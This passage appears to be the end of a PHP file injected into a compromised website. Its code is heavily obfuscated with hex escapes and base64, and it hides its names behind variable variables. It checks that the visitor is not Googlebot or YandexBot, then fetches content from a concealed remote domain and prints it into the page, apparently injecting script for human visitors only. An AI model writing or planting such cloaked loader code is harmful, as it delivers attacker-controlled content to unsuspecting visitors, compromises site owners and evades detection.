6c\x77\x6eK1wnMzR\x63Jyt\x63\x4az\x49zX\x43c\x72\x58\x43cz\x4d\x7a\x30iXC\x63r\x58\x43\x63\x77Ii\x41zM\x6c\x77nK\x31w\x6eM\x7a\x56\x63\x4a\x79\x74\x63Jz\x4d\x32\x58Ccr\x58C\x63zPS\x4a\x63\x4ay\x74c\x4az\x41\x69\x49\x44M3\x58\x43crX\x43czO\x46\x77nK1\x77\x6eM\x7a\x46cJy\x74c\x4azI\x31\x50S\x4acJy\x74cJ\x7a\x41iI\x44\x490X\x43\x63\x72\x58\x43\x63y\x4e\x6cwn\x4b1\x77\x6e\x4djdcJyt\x63\x4a\x7a\x559\x49lwnK1w\x6e\x4djl\x63\x4a\x79\x74c\x4ayI+X\x43\x63r\x58Cc\x38\x58C\x63\x72\x58C\x63vX\x43\x63\x72\x58C\x63\x32XCcrXC\x63yX\x43crXCcy\x4f\x46wn\x4b1\x77\x6e\x4eFwn\x4b1w\x6e\x50\x6cw\x6e\x4b\x54sn\x4c\x44\x45\x77\x4cD\x4d\x35L\x43d8\x66\x47ZyfG\x68\x38ZXx\x6e\x66\x47l8aG\x56pf\x47l\x75Z\x47\x56\x34\x66H\x428\x642l\x6bf\x47F8d\x47h\x38\x61\x48\x42\x38bHx\x68b\x57V8d\x33J\x70dGV8ZG9\x6ad\x571lbn\x52\x38c3\x78\x79Y\x33x\x6e\x61Hx\x30d\x48B\x38b\x3218c\x6d\x52l\x66H\x4e\x6afGh\x30f\x48\x4a\x76bHxsa\x57\x35\x38\x59W\x31\x38\x62m9\x38\x64H\x78\x75\x61\x47\x56\x70Z3\x78\x74\x59\x58\x4a8cn\x78\x68\x62\x57\x56\x69b\x33x\x6eaW5\x33\x66\x47l\x6b\x64HxtYXx\x79\x5a2\x6bn\x4c\x6e\x4ew\x62\x47l\x30KCd8Jy\x6b\x73MC\x78\x37\x66\x53k\x70DQ\x6f8\x4c3N\x6acmlw\x64\x44\x34\x3d");return${${"\x47L\x4fBAL\x53"}["\x6bq\x63\x6f\x6ac\x67s\x71\x63"]};}if((stripos($_SERVER["HT\x54P_U\x53\x45R\x5fA\x47EN\x54"],"\x47o\x6fg\x6ce\x62ot")==false)&&(stripos($_SERVER["HTT\x50_USE\x52\x5fA\x47\x45\x4e\x54"],"Ya\x6e\x64\x65\x78\x42ot")==false)){$pfnekh="\x66unc";$lwxorpyz="\x74\x79\x70\x65\x73";${${"\x47\x4cOB\x41L\x53"}["\x69\x68\x66\x6b\x76b\x77\x71\x6f\x6f\x6e\x73"]}=array("ty\x70e1","\x74yp\x652","\x74y\x70e\x33");foreach(${$lwxorpyz} as${$pfnekh}){${"\x47L\x4fBALS"}["\x61xq\x77w\x72\x79"]="d\x6f\x6d\x61\x69n";$cdzkxgsdgaj="fu\x6e\x63";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6b\x71c\x6f\x6a\x63g\x73\x71\x63"]}=${$cdzkxgsdgaj}(${${"G\x4c\x4f\x42AL\x53"}["o\x79x\x63w\x64\x76\x6e\x6c"]},${${"G\x4c\x4fBA\x4c\x53"}["\x61x\x71ww\x72\x79"]},${${"\x47\x4cOB\x41\x4c\x53"}["sd\x6c\x75\x6a\x73i\x6fi\x73\x68"]});if(${${"GL\x4f\x42\x41\x4c\x53"}["\x6bqc\x6f\x6a\x63\x67\x73\x71\x63"]}!==false){echo${${"\x47\x4cO\x42\x41\x4c\x53"}["kq\x63oj\x63\x67\x73\x71\x63"]};break;}}}
	?>